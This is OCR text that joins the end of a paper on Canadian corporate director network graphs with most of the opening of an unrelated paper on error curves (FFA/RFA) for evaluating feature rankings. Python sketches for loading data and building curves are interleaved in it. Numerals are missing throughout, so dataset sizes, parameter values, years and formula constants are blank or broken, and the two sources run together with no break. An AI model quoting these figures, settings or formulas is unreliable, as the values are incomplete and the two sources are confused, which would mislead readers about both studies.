the key limitations of the data presented here have already been alluded to; it is unknown whether the dod is representative of all of the public companies in canada at the time, or whether it was biased toward companies listed on the toronto stock exchange. at the time, montreal was the home of the major stock exchange, although toronto was also considered a major center. it seems reasonable to assume that w.r. houston would not overlook major firms listed in montreal. however, he may not have been aware of a number of companies that were listed in winnipeg. the preface to the dod makes it clear that there were a number of non-responses to houston's survey of directors of public companies in canada. however, these limitations are perhaps forgivable given that there does not exist a canonical list of canadian public companies from this period. although imperfect, the dod provides one of the most complete listings of directors and firms from that period (for discussion of these points, see mackay, ).
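to make the file layout concrete, here is a minimal sketch of how the two csv projections described above could be loaded for analysis in python. the file names and column names used below are assumptions for illustration, not the exact names shipped with the paper, and pandas and networkx are assumed to be available.

# A minimal sketch of loading the corporate projection described above.
# File and column names here are hypothetical; the actual files provided
# with the paper may use different ones.
import pandas as pd
import networkx as nx

# Company-to-company projection: nodes are firms, an edge means at least one
# shared director; the 'weight' column counts the shared directors.
company_nodes = pd.read_csv("dod_companies_nodes.csv")
company_edges = pd.read_csv("dod_companies_edges.csv")

G_companies = nx.Graph()
for _, row in company_nodes.iterrows():
    G_companies.add_node(row["company"],
                         city=row.get("city"),
                         prov=row.get("prov"),
                         latitude=row.get("latitude"),
                         longitude=row.get("longitude"))
for _, row in company_edges.iterrows():
    G_companies.add_edge(row["source"], row["target"],
                         weight=row.get("weight", 1))

# Boards that are strongly interlocked (two or more shared directors).
strong_ties = [(u, v) for u, v, d in G_companies.edges(data=True)
               if d.get("weight", 1) > 1]
print(len(strong_ties), "company pairs share more than one director")

the person projection can be loaded in the same way, swapping the node and edge files; the same latitude/longitude attributes can then be fed to a geographic layout such as the one suggested above.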
the data used to create the graph files were extracted using optical character recognition (ocr) software from electronic versions of the dod and then manually corrected by the author and assistants. ultimately, assigning a tie between nodes in the graphs relies upon the names being listed consistently throughout the dod. it is also assumed that the ocr and text cleaning process found and corrected any mis-spellings, so that the common ties could be correctly created. every attempt has been made to clean and translate the data appropriately.

conclusion
this paper has presented an overview of two projections of graphs based on information extracted from the dod. the graph files have been created so that they are easily usable by non-specialists. additional information has also been added, which makes it possible to integrate these networks with canadian national census data from the period, or to plot locations of directors or companies using longitude and latitude pairs. it is hoped that this information will be of use to both business historians and network scholars.

acknowledgments
the author would like to thank the participants in the canadian business history association conference, from public interest to private profit, at the rotman school of management, university of toronto, for their helpful feedback on this project. the author is grateful to professor leslie hannah for his insights on this data and public corporations in canada during this period, and also to the centre for corporate reputation in the saïd business school at the university of oxford for funding this project. jon mackay is an affiliated researcher with the waterloo institute for complexity and innovation (wici) at the university of waterloo, canada. his interests include network theory, corporate governance, and canadian business history.

references
bastian, m., heymann, s., & jacomy, m. . gephi: an open source software for exploring and manipulating networks. presented at the international aaai conference on weblogs and social media.
houston, w. r. . directory of directors in canada, . toronto: houston's standard publications. available at: http://archive.org/details/directorydirector- housuoft
mackay, j. . canadian regional and national business elites in : who was connected, who wasn't and why? a history of socially responsible business, c. – : – . palgrave macmillan, cham.
murphy, g. j. . early canadian financial statement disclosure legislation. the accounting historians journal, ( ): – .

error curves for evaluating the quality of feature rankings
ivica slavkov, matej petković, pierre geurts, dragi kocev, and sašo džeroski
jozef stefan institute, ljubljana, slovenia; jozef stefan international postgraduate school, ljubljana, slovenia; université de liège, liège, belgium

abstract
in this article, we propose a method for evaluating feature ranking algorithms. a feature ranking algorithm estimates the importance of descriptive features when predicting the target variable, and the proposed method evaluates the correctness of these importance values by computing the error measures of two chains of predictive models. the models in the first chain are built on nested sets of top-ranked features, while the models in the other chain are built on nested sets of bottom-ranked features.
we investigate which predictive models are appropriate for building these chains, showing empirically that the proposed method gives meaningful results and can detect differences in feature ranking quality. this is first demonstrated on synthetic data, and then on several real-world classification benchmark problems. subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning keywords feature ranking, error curves, evaluation introduction in the era of data abundance, we face high-dimensional problems increasingly often. sometimes, prior to applying predictive modeling (e.g., classification) algorithms to such problems, dimensionality reduction may be necessary for a number of reasons, including computational reasons. by keeping only a limited number of descriptors (features), a classifier can also achieve better predictive performance, since typically, a portion of the features strongly influence the target variable, and the others can be understood as (mostly) noise. this dimensionality reduction corresponds to the task of feature selection (guyon et al., ). a task related to it is feature ranking. this is a generalization of feature selection where, in addition to simply telling apart relevant features from irrelevant ones (nilsson et al., ), one also assesses how relevant are they for predicting the target variable. in machine learning, feature ranking is typically seen either as a preprocessing or as a postprocessing step. in the former case, one actually tackles the feature selection problem by first computing the feature relevance values, and then keeping only the features whose relevance is above some user defined threshold. in the second case, feature ranking is obtained after building a predictive model in order to explain it, for example (arceo- vilas et al., ). for black box models, such as neural networks, this may be the only way to understand their predictions. how to cite this article slavkov i, petković m, geurts p, kocev d, džeroski s. . error curves for evaluating the quality of feature rankings. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted october published december corresponding author matej petković, matej.petkovic@ijs.si academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright slavkov et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:matej.�petkovic@�ijs.�si https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ in some application domains, such as biology or medicine, feature ranking may be the main point of interest. if we are given data about the expression of numerous genes, for a group of patients, and the patients’ clinical state (diseased/healthy), one can find good candidate genes that influence the health status of the patients, which gives us a deeper understanding of the disease. due to the prominence of the feature ranking task, there exist many feature ranking methods. simpler methods assess the relevance of each feature independently ignoring the other features (χ statistics, mutual information of the feature and the target variable) and their possible interactions. 
a prominent example that shows the myopic nature of such approaches is the case when the target variable y is defined as y = xor (x , x ) where x and x are two binary features. ignoring x when computing the relevance of x (and vice-versa) would result in assessing x as completely irrelevant, that is, as random noise. more sophisticated methods assess relevance of each feature in the context of the others. they are typically based on some predictive model, for example, random forest feature ranking (breiman, ), or optimization problem (nardone, ciaramella & staiano, ), but not necessarily, cf. for example, relieff (robnik-Šikonja & kononenko, ) and the work of li & gu ( ). however, there is no unified definition of feature importance, and actually, every feature ranking algorithm comes with its own (implicit) definition. therefore, different methods typically introduce different feature importance scores: deciding which of them is the best is a very relevant, but also very challenging task that we would like to address in this article. more precisely, we continue and extend our previous work (slavkov et al., ), where we proposed and evaluated a quantitative score for the assessment of feature rankings. here, we propose a new feature ranking evaluation method that can evaluate feature rankings in a relative sense (deciding which of the feature rankings is better), or in an absolute sense (assessing how good is a feature ranking). the method is based on constructing two chains of predictive models that are built from the top-ranked and bottom-ranked features. the predictive performances of the models in the chain are then shown on graphs of so called forward feature addition (ffa) and reverse feature addition (rfa) curves, which reveal how the relevant features are distributed in the ranking(s). an important property of the proposed method is that it does not need any prior ground truth knowledge of the data. we investigate the performance of the proposed evaluation approach under a range of scenarios. to begin with, we prove the potential of the ffa and rfa curves by using them in setting which employs synthetic data. next, we investigate the use of different types of predictive models for constructing the curves, thus considerably extending the preliminary experiments by slavkov et al. ( ). furthermore, we apply the proposed evaluation approach to a large collection of benchmark datasets. compared to slavkov et al. ( ), we have included new high-dimensional datasets. the results of the evaluation, in a nutshell, show that the ffa and rfa curves are able to discern the best ranking among multiple proposed feature rankings. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the remainder of this article is organized as follows. “related work” outlines related work, “method for evaluating feature rankings” describes in detail the proposed method for constructing error curves. next, “empirical evaluation of ffa/rfa curve properties” discusses the properties of the error curves when applied to synthetic data. we then give the results of the experimental evaluation on benchmark datasets in “feature ranking comparison on real-worlds datasets”. “conclusions” concludes with a summary of our contributions and an outline of possible directions for further work. 
in the appendices, we give additional information about generating synthetic data (appendix a ), measuring distance between rankings (appendix a ), and comparative evaluation of feature ranking methods (appendix a ). in appendix a , detailed experimental results are given. related work the evaluation of feature rankings is a complex and unsolved problem. typically, feature rankings are evaluated on artificially generated problems, while evaluation on real world problems remains an issue approached indirectly. to begin with, when the ground truth ranking is known, one can transform the problem of feature ranking evaluation into an evaluation of classification predictive model (jong et al., ) as follows. first, a ranking is computed. then, for every threshold, the numbers of relevant features (true positives) and irrelevant features (false positives) with the feature relevance above the threshold are computed. from these values, a roc curve can be created and the area underneath it computed. another possible approach is to compute separability (robnik-Šikonja & kononenko, ), that is, the minimal difference between the feature importance of a relevant feature and the feature importance of an irrelevant feature. if this difference is positive, then the relevant features are separated from the irrelevant ones, otherwise they are mixed. however, both approaches are more applicable to feature selection problems and are too coarse for feature rankings problem, since they only differentiate between relevant and irrelevant features. spearman’s rank correlation coefficient between the computed and the ground truth ranking might be more appropriate. the main shortcoming of the upper approaches is that they demand the ground truth ranking. in real world scenarios, this is not known, which makes the upper approaches useless. nevertheless, using synthetic data and the controlled environment offers a good starting point for showing the usefulness of a feature ranking evaluation method, as we shall also see later. an approach that overcomes the issue of unknown ground truth ranking bases on selecting k top-ranked features and building a predictive model that uses only these features to predict target variable. the ranking whose top-ranked features result in the model with the highest predictive performance, is proclaimed the best. since it is now always clear which value of k should be chosen, this can be done for multiple values of k (guyon et al., ; furlanello et al., ; paoli et al., ; verikas, gelzinis & bacauskiene, ). slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in addition to correctness, rankings stability is sometimes also part of the evaluation. the stability of a ranking algorithm can be measured by comparing the feature rankings obtained, for example, from the different bootstrap replicates of a dataset or from the folds in cross-validation (guzmán-martnez & alaiz-rodrguez, ; kalousis, prados & hilario, ; jurman et al., ). in saeys, abeel & de peer ( ) both stability and predictive performance are combined into a single feature ranking quality index. also, notions similar to ffa curves (without any particular name, though) as the feature ranking evaluation method can be found in the literature (liu et al., ; duch, wieczorek & biesiada, ; biesiada et al., ; liang, yang & winstanley, ). 
however, to the best of our knowledge, there is no discussion and detailed investigation why ffa curves are an appropriate method for comparing feature rankings, nor which learning methods should (or should not) be used for constructing them. a method for evaluating feature rankings first of all, every feature ranking method should be able to tell apart relevant features from irrelevant ones (nilsson et al., ). in addition to that, the method should order the features with respect to the target variable, awarding the most relevant ones the top ranks. if ground truth ranking exists, the method should return this ranking in the optimal case. the worst case is more complicated and has two possible answers. one is the inverse of the ground truth ranking. however, since the ground truth ranking is typically not known in real-world scenarios, a more useful definition of the worst ranking is random ranking. this ranking also contains as little information about the distribution of the relevant features in the ranking as possible. moreover, this distribution can be always assessed and is the cornerstone of our ranking evaluation method. the evaluation method first, we define the notation used in the rest of the article: d denotes a dataset whose columns are input features fi that form a set f, and the target feature ft. a feature ranking method takes the dataset as an input, and returns a list r ¼ ðfð Þ; . . . ; fðnÞÞ as the output, where f(i) is the feature with the rank i. we evaluate a ranking r by evaluating different subsets s of features f. this is done by building a predictive model mðs; ftÞ and assessing its predictive power. the evaluation of the predictive model provides a cumulative assessment of the information contained in the feature set s and it can be quantified with an error measure errðmðs; ftÞÞ. the question is how to generate the feature subsets from the feature ranking, so that the error estimates can provide insight into the correctness of the feature ranking and constitute an evaluation thereof. the construction of the feature subsets should be guided by the feature ranking r. starting from the top ranked feature f( ) and going towards the bottom ranked feature f(n), the feature relevance should decrease. following this basic intuition, we propose two methods for constructing feature subsets from the feature ranking: ffa and rfa. slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ forward feature addition constructs the feature subsets si by considering the i highest ranked features, starting with s = {f( )}. the next set s i+ is constructed by adding the next lower-ranked feature, namely si+ = si ∪ {f(i+ )}. the process continues until i = n and sn contains all of the features from r. reverse feature addition produces feature sets si constructed in an opposite manner to ffa. we start with s ¼ ffðnÞg that contains only the lowest ranked feature. the next feature set si+ is constructed by adding the lowest-ranked feature which is not in si, namely si+ = si ∪ {f(n−i)}. in the same way as for ffa, the process of rfa continues until we include all of the features, that is, sn = f. note that ffa can be viewed as backward feature elimination. starting from sn = f, at each step we remove the least relevant feature from si to obtain si− . similarly, rfa can be viewed as forward feature elimination. finally, it holds that f = sn−i ∪ si for all i. 
for each i and each constructed feature subset si or s̄i, we build the predictive models m(si, ft) and m(s̄i, ft). we then estimate their respective prediction errors, erri and err̄i. this results in two error curves. we name them ffa and rfa curves, each constructed by the corresponding ffa/rfa feature subset construction method. the value of each point of the ffa curve is defined as ffa(i) = erri, while for the rfa curve as rfa(i) = err̄i. the process of ffa/rfa curve construction is summarized in algorithm . the computational complexity of the proposed algorithm for constructing a single (ffa or rfa) curve is o(n(m + t)), where n is the number of features, m = m(n) is the cost of constructing the predictive model and t = t(n) is the cost of its evaluation. it should be noted that m and t are dependent on the specific learning method used for inducing the model and on the procedure used for evaluating it. typically, the points ffa(i), ffa(i + 1), …, do not differ considerably for i large enough, since it is expected that only a small proportion of the features is relevant when the data is high-dimensional. this means that we can make the algorithm more efficient if we construct the set si+δ(i) from the set si by including δ(i) features into it. analogously, we speed up the construction of the rfa curves.

algorithm : generation of the ffa and rfa curves.
input: feature ranking r = (f(1), …, f(n)), target feature ft, type of curve (ffa or rfa)
  s ← Ø
  e ← list of length n
  for i = 1, 2, …, n do
    if curve type is ffa then
      s ← s ∪ {f(i)}
    else
      s ← s ∪ {f(n−i+1)}
    e[i] ← err(m(s, ft))
  return e

interpretation of error curves
the visualization and interpretation of the ffa and rfa curves can be explained by considering the examples of ffa and rfa curves given in fig. . the y-axis for both curves is the same and depicts the error estimate of a feature subset. point i at the x-axis corresponds to the moment when the feature f(i) is first included in the predictive model: si for the ffa curve and s̄n−i+1 for the rfa curve. thus, the ffa curve in fig. is constructed from left-to-right, as the top-ranked features are at the beginning of the ranking. in contrast, the rfa curve is constructed from right-to-left, starting with the end of the ranking and going towards its beginning. let us first focus on the ffa curve. we can observe that as the number k of features increases, the accuracy of the predictive models also increases. this can be interpreted as follows: by adding more and more of the top-k ranked features, the number of relevant features in the constructed feature subsets increases, which is reflected in the improvement of the accuracy (error) measure. next, for the rfa curve in fig. , if we inspect it from right-to-left, we can notice that it is quite different from the ffa curve at the beginning. namely, the accuracy of the models constructed with the bottom-ranked features is minimal, which means the ranking is correct in the sense that it puts only irrelevant features at the bottom of the ranking. as the number of bottom-k features increases, some relevant features are included and the accuracy of the models increases. we now consider the complete fig. . the ffa and rfa curves essentially provide an estimate of how the relevant features are spread throughout the feature ranking.
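a possible realization of the curve-construction procedure summarized in the algorithm above is sketched below, assuming scikit-learn is available; the estimator, its settings and the cross-validation scheme are illustrative assumptions rather than the exact configuration used in this article.

# A sketch of the FFA/RFA curve construction, assuming scikit-learn.
# The SVM settings and the 10-fold cross-validation are illustrative choices.
import numpy as np
from sklearn.model_selection import cross_val_score
from sklearn.svm import SVC

def error_curve(X, y, ranking, curve="ffa", cv=10):
    """Return err(M(S, f_t)) for the nested feature subsets.

    X: (n_samples, n_features) array, y: class labels,
    ranking: feature indices ordered from most to least relevant.
    """
    n = len(ranking)
    subset, errors = [], []
    for i in range(1, n + 1):
        # FFA adds the i-th best feature, RFA adds the i-th worst one.
        subset.append(ranking[i - 1] if curve == "ffa" else ranking[n - i])
        acc = cross_val_score(SVC(kernel="poly", degree=2),
                              X[:, subset], y, cv=cv).mean()
        errors.append(1.0 - acc)  # err = 1 - accuracy for classification
    return errors

# Example usage on random data with a hypothetical ranking:
rng = np.random.default_rng(0)
X = rng.normal(size=(200, 8))
y = (X[:, 0] + X[:, 3] > 0).astype(int)
ranking = [0, 3, 1, 2, 4, 5, 6, 7]
ffa = error_curve(X, y, ranking, curve="ffa")
rfa = error_curve(X, y, ranking, curve="rfa")

the same helper can also implement the δ(i) speed-up mentioned above, simply by adding several features per step instead of one.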
namely, the ffa curve provides us with an estimate of where the relevant features appear at the top of the ranking, while the rfa curve provides an estimate of where relevant features appear at the bottom of the ranking.

figure : sample ffa and rfa curves.

in the specific case depicted in fig. , the relevant features are located between the st and the th ranked feature. besides providing an estimate of the spread of the relevant features across the feature ranking, the real utility of the ffa/rfa curves becomes apparent if we consider them in a relative, or more precisely, a comparative context. let us consider two arbitrary feature ranking methods ra and rb, which produce feature rankings ra and rb, respectively. for these two rankings, we present the corresponding ffa/rfa curves in fig. . we first inspect the ffa curves visually. we find that the values of the ffa curve of the ranking method ra are (most of the time) above the ffa curve of the other ranking method rb. this can be interpreted in the following way: for an arbitrary k, when considering the top-k features of the feature rankings ra and rb, more relevant features are included in the top-k features of ranking ra than in the top-k features of ranking rb. this implies that ranking algorithm ra produces a better ranking than ranking algorithm rb. a similar discussion applies to the rfa curve. when one considers the bottom-k features of a given feature ranking, most of the time, feature ranking ra includes fewer relevant features than feature ranking rb, that is, the predictive models constructed are less accurate. here, because the opposite logic of the ffa curve applies, one can again conclude that the feature ranking algorithm ra produces a better feature ranking than the feature ranking algorithm rb.

figure : comparison of ffa curves (a) and rfa curves (b) of two ranking methods ra and rb.

expected ffa and rfa curves
when one wants to assess the quality of a single feature ranking in a real-world application, its forward (reverse) feature addition curves can only be compared to the curves that belong to a ranking generated uniformly at random, since the ground-truth ranking is not known. as discussed before, the random ranking rrnd is the worst-case ranking, since it contains no information about the distribution of the relevant features. as such, it can also serve as a baseline. the expected values of the points that define the ffa curve of the ranking rrnd coincide with the expected values of the rfa curve of this ranking, since the corresponding values only depend on the data itself and on the number of features i at a given point of the curves. thus, expected curves can be the common name for both types of curves that belong to rrnd.
computing the exact average error estimates $E_S[\mathit{err}_i] = E_S[\overline{\mathit{err}}_i]$, where $S \subseteq F$ and $|S| = i$, may be unfeasible if the number of features n is large (e.g., for i = n/2, a number of models of the order of $\binom{n}{n/2}$ would have to be evaluated), but one can overcome this by sampling the sets s.

stability of feature ranking
an important aspect of feature ranking algorithms is their stability (nogueira, sechidis & brown, ) or, more specifically, the stability of the ranked feature lists that they produce. once we have the set r of m rankings rt that were induced from the different samples of the dataset d, the stability index st(r) can be calculated as

$$St(R) = \frac{2}{m(m-1)} \sum_{t=1}^{m-1} \sum_{s=t+1}^{m} sm(R_t, R_s),$$

that is, the stability index is the average of the pairwise similarities sm over all pairs of rankings. in general, the function sm can be any (dis)similarity measure, for example, the spearman rank correlation coefficient (saeys, abeel & de peer, ; khoshgoftaar et al., ), the jaccard distance (saeys, abeel & de peer, ; kalousis, prados & hilario, ), an adaptation of the tanimoto distance (kalousis, prados & hilario, ), the fuzzy (goodman and kruskal's) gamma coefficient (boucheham & batouche, ; henzgen & hüllermeier, ), etc. to assess the stability of feature rankings in our experimental work, we set sm = ca, where ca is the canberra distance (lance & williams, ; lance & williams, ; jurman et al., ). this is a weighted distance metric that puts greater emphasis on the stability of the top-ranked features. if we have two feature rankings ra and rb of n features, then the canberra distance is defined as

$$Ca(r_a, r_b) = \sum_{j=1}^{n} \frac{|\mathrm{rank}_a(f_j) - \mathrm{rank}_b(f_j)|}{\mathrm{rank}_a(f_j) + \mathrm{rank}_b(f_j)}. \qquad ( )$$

however, we do not only estimate the stability of the ranking as a whole. rather, we also estimate the stability of the partial rankings based on the features from si. in order for the distance to be applicable to such partial rankings with i < n features, the following adaptation is proposed: instead of using the ranks $\mathrm{rank}_{a,b}(f)$, we use $\mathrm{rank}^i_{a,b}(f) = \min\{\mathrm{rank}_{a,b}(f),\, i + 1\}$, that is, all features with rank higher than i are treated as if they had rank i + 1:

$$Ca(r_a, r_b) = \sum_{j=1}^{n} \frac{|\mathrm{rank}^i_a(f_j) - \mathrm{rank}^i_b(f_j)|}{\mathrm{rank}^i_a(f_j) + \mathrm{rank}^i_b(f_j)}. \qquad ( )$$

additionally, we would like the stability indicator to be independent of the specific values of i and n. hence, we normalize it by the expected canberra distance between random rankings, denoted by ca(n, i). it can be approximated (jurman et al., ) as

ca(n, i) ≈ ((i + )( n − i)/n) log + (i( + i))/( n) + i − , ( )

which we make use of when i ≥ and the computation of the exact value becomes intractable. for i ≥ , the relative error of the approximation ( ) is smaller than %. our final stability indicator is thus the curve consisting of the points

$$\left(i,\; \frac{St(S_i)}{Ca(n, i)}\right), \qquad ( )$$

for 1 ≤ i ≤ n, which represent the relative change of the distance between top-i lists w.r.t. the expected top-i distance.

empirical evaluation of ffa/rfa curve properties
we start with the experiments on synthetic datasets. in such laboratory conditions, one has full control over the data, can establish the ground truth feature ranking, and can produce rankings of different quality. such a setting facilitates a proper assessment of our proposed feature ranking evaluation method. before proceeding to the experiments, we briefly describe the constructed synthetic datasets. the detailed description of the datasets is given in "appendix a ".
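before moving to the experiments, the stability indicator defined above can be made concrete with a short sketch. it assumes numpy, the helper names are ours, and the expected top-i canberra distance is estimated here by sampling random permutations instead of using the closed-form approximation ( ).

# A sketch of the stability indicator defined above. Rankings are given as
# rank vectors: rank_a[j] is the (1-based) rank of feature j in ranking a.
import itertools
import numpy as np

def canberra_top_i(rank_a, rank_b, i):
    """Top-i Canberra distance: ranks below i are clipped to i + 1."""
    ra = np.minimum(rank_a, i + 1)
    rb = np.minimum(rank_b, i + 1)
    return np.sum(np.abs(ra - rb) / (ra + rb))

def stability_curve(rankings, n_random=200, seed=0):
    """rankings: list of m rank vectors obtained from different data samples."""
    rng = np.random.default_rng(seed)
    n = len(rankings[0])
    pairs = list(itertools.combinations(rankings, 2))
    curve = []
    for i in range(1, n + 1):
        st = np.mean([canberra_top_i(a, b, i) for a, b in pairs])
        # Monte-Carlo estimate of the expected distance between random rankings.
        rand = [canberra_top_i(rng.permutation(n) + 1, rng.permutation(n) + 1, i)
                for _ in range(n_random)]
        curve.append(st / np.mean(rand))
    return curve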
we construct three datasets named single, pair and combined. each of them consists of , instances and features. the relevant features in the single dataset are individually correlated with the target, the relevant features in the pair dataset are related to the target via the xor relation, and the relevant features in the combined dataset are the union of the relevant features in the single and pair datasets. the rest of the features in the datasets are random noise.

evaluation by randomising the ground truth ranking
the appropriateness of the proposed method is first demonstrated on a family of feature rankings that contain more and more noise. by doing that, we can show that the lower and lower quality of the feature rankings is reflected in the ffa and rfa curves, and is thus detected by the method. we start with the ground-truth ranking rgt and perturb it as follows. first, we select a proportion θ of randomly selected features, which are then assigned random relevances, drawn uniformly from the unit interval. the other features preserve their ground truth relevance. this results in a ranking rθ.

experimental setup
we use the aforementioned single, pair and combined datasets. the following amounts θ of noise are introduced into the ground truth ranking: θ ∈ { . , . , . , . , . , . , }. the value θ = corresponds to a completely random ranking. for every value of θ, we estimate the expected values of the ffa/rfa curves that belong to the ranking rθ by first generating m = realizations of the ranking and, second, (point-wise) averaging the error estimates of the obtained predictive models. for constructing the ffa/rfa curves, svms were used, as noted and justified at the end of "analysis of different learning methods to construct ffa and rfa curves". the curves were constructed via -times stratified -fold cross validation, using different random seeds.

results
the obtained ffa and rfa curves are shown in fig. , which gives the results for the dataset combined. the results for the datasets single and pair are similar. in addition to the curves that belong to the rankings rθ with different amounts of noise, the ground truth ranking is also shown. both the ffa curves (fig. a) and the rfa curves (fig. b) correctly detect the different amounts of noise θ: the higher the θ, the farther the ffa and rfa curves of rθ are from the curves of the ground truth ranking. an independent confirmation of these results is given in "appendix a ". additionally, note that ffa curves cannot give all the information about the ranking: had we not plotted the rfa curves in fig. b, we would not have a proof that all of the rankings misplace some relevant features (check the considerable decrease in accuracy just before the th feature).

figure : dataset combined: forward feature addition curves (a) and reverse feature addition curves (b). the curves for the noisy rankings rθ ( . ≤ θ ≤ ) and the ground truth ranking are shown.

analysis of different learning methods to construct ffa and rfa curves
according to algorithm , the error curve estimates depend not only on the feature ranking method, but also on the learning method used to construct the predictive models. in this section, we investigate which learning methods (learners) are suitable for constructing the ffa and rfa curves. note that we are not searching for a learner that would produce the most accurate predictive models. rather, the requirement for the learner to be used in this context is that it should produce predictive models that exploit all the information that the features contain about the target concept, and can thus distinguish between feature rankings of different quality.

experimental setup
when comparing the ffa and rfa curves of different ranking methods, constructed with different learners, we used the combined dataset described in detail in "appendix ". we consider the following four feature ranking methods:
- information gain, where we calculate the information gain of each feature fi as ig(ft, fi) = h(ft) − h(ft | fi);
- svm-rfe, which uses a series of support vector machines (svms) to recursively compute a feature ranking. a linear svm was employed, as proposed by guyon et al. ( ). following slavkov et al. ( ), we set ε = − and c = . ;
- the relieff algorithm, as proposed by robnik-Šikonja & kononenko ( ). the number of neighbors was set to , and the number of iterations was set to %;
- random forests, which can be used for estimating feature relevance as described by breiman ( ). a forest of trees was used, constructed by randomly choosing the rounded-up log of the number of features.

we compare the above ranking methods by using different learners to produce classifiers and generate error estimates for the ffa and rfa curves. more specifically, we consider:
- naïve bayes (john & langley, );
- decision trees (quinlan, );
- random forests (breiman, ): the number of trees was set to , and in each split the log of the number of features is considered;
- svms (cortes & vapnik, ): a polynomial (quadratic) kernel was employed, with ε = − and c = . ;
- k-nn (aha & kibler, ) with a value of k = .

the curves were constructed via -times stratified -fold cross validation, using different random seeds. the obtained ffa and rfa curve comparisons of the four feature ranking methods, obtained with each of the five learning methods, are presented in the following section.

results
the rankings are shown in fig. , where each graph represents the distribution of the ground truth relevance values. the y-axis depicts the ground truth relevance value ( ). each point, i, represents the i-th ranked feature, f(i), as determined by the feature ranking method.
we can see that the rankings fall into two groups: in figs. a and b, the highly relevant features are concentrated on the left, while in figs. c and d, they are evenly spread. relieff and random forests (figs. a and b) are thus clearly better than info gain and svm-rfe (figs. c and d). hence, the ffa and rfa curves should at least differentiate between the two groups of rankings. however, there should also be a visible difference between relieff and random forests at the beginning of the ranking. the detailed comparative evaluation of the obtained feature rankings is given in "appendix a ".

figure : distribution of relevant features for each of the four ranking methods: relieff (a), random forests (b), info gain (c) and svm-rfe (d).

in the case of ffa curves, the learners can be divided into two groups: ffa curves produced by naïve bayes, decision trees and random forests cannot capture any difference between rankings, whereas those produced by svms and k-nn can. it suffices to show one representative graph for each group (those for naïve bayes and k-nn are shown in fig. ), since there are no significant differences among the learning methods in the same group. the ffa curves produced by these two learners have all the desirable properties: the curves for relieff and random forests are better than those of info gain and svm-rfe. additionally, at the beginning, the random forest curve is under the curve of relieff.

figure : comparison of ffa curves for the four different ranking methods for the combined dataset. the curves were obtained by using naïve bayes (a) and k-nn (b).

figure : comparison of rfa curves for the four different ranking methods for the combined dataset. the curves were obtained by using decision trees (a) and k-nn (b).

compare, for example, fig. b (obtained by k-nn) with fig. a a (obtained by svms), which is given in the appendix (note that fig. a a also contains the random ranking curve).

the reason why, for example, the naïve bayes classifier does not show any difference between rankings is the fact that it cannot use information from interactions of higher order. namely, it assumes feature independence. hence, it is not appropriate for use in the considered context. if we proceed to the rfa curves, again, the naïve bayes classifier does not show any difference between rankings, whereas the other four methods do. we prefer random forests, svms and k-nn over decision trees in the case of rfa curves, because decision trees generate quite unstable curves, as shown in fig. a. in fig. b, the rfa curves of k-nn are shown. again, there is no quantitative difference between them and the rfa curves generated by svms (compare figs. b–a b, given in "appendix a "). to sum up, one can use:
- svms and k-nn models for constructing ffa curves,
- svms, k-nn and random forests for constructing rfa curves.
thus, only k-nn and svms are appropriate for constructing both ffa and rfa curves. since one should typically use approximate k-nn when the number of features is extremely high (muja & lowe, ), we use svms (with the settings described here) as the learner for constructing the ffa/rfa curves in all the remaining experiments in this work.

discussion
we have to give some additional notes about choosing the best method when, for example, different learning methods prioritize different rankings, which is possible since one learning method might make use of some features, whereas another learning method can make better use of some others. first, if we have computed feature rankings in order to learn a classifier that uses only a subset of (top-ranked) features and we have already decided on which classifier to use, we should use the same (type of) classifier to construct the curves, because we want to use the features that the chosen learning method prioritizes. second, if our motivation for computing the feature rankings is to discover all relevant features for a given problem (e.g., the genes that influence the patients' clinical state), and learning method a prioritizes the ranking r = (x1, x2, …) over the ranking r′ = (x1′, x2′, …), whereas learning method b prioritizes r′ over r, this means that x1, x2, x1′ and x2′ are important (provided that both learners achieve similar accuracy), so we can include them all in the subsequent experiments (and thus use both learning methods). the decision about which of the two appropriate methods to use, k-nn or svms, might also depend on the properties of the dataset at hand. as mentioned before, k-nn could be too time-consuming when the number of features is extremely high. on the other hand, if the number of instances is high, svms could be too time-consuming, but speed-ups are possible (tsang, kwok & cheung, ). as for noise, both methods are quite robust (wang, jha & chaudhuri, ; xu, caramanis & mannor, ), so this is not among the most influential factors.
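for reference, the two learners found appropriate above can be instantiated as follows; this is a sketch assuming scikit-learn, and the hyperparameter values are illustrative, since the exact values used in the article are not reproduced here.

# The two learners found appropriate above, as scikit-learn estimators.
# The hyperparameter values below are illustrative settings only.
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier

curve_learners = {
    "svm": SVC(kernel="poly", degree=2, C=1.0),   # quadratic kernel, as in the text
    "knn": KNeighborsClassifier(n_neighbors=10),  # k is an assumed value
}
# Either estimator can be plugged into a curve-construction routine,
# such as the error_curve sketch given earlier.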
feature ranking comparison on real-world datasets
in this section, we move from the synthetic data and show the appropriateness of the proposed feature ranking evaluation method on real-world data with unknown relevant and irrelevant features. to be consistent with the synthetic-data experiments, we evaluate the same four feature ranking methods as before, and compare them to the random feature rankings, which now serve as the only baseline.

datasets description
in this extensive study, classification benchmark problems are used. they come in two groups. the first group has been part of the experiments in slavkov et al. ( ) and, except for aapc (džeroski et al., ), water and diversity (džeroski, demšar & grbović, ), mostly originates from the uci data repository (newman & merz, ). these benchmark problems have a higher number of instances (up to , ) and a number of features that is not extremely high (up to ). these problems cover various domains: health, ecology, banking, etc. the second group is newly included and contains high-dimensional micro-array benchmark problems (mramor et al., ) (up to , features) with a lower number of examples (up to ). the main properties of the data are given in table .

experimental setup
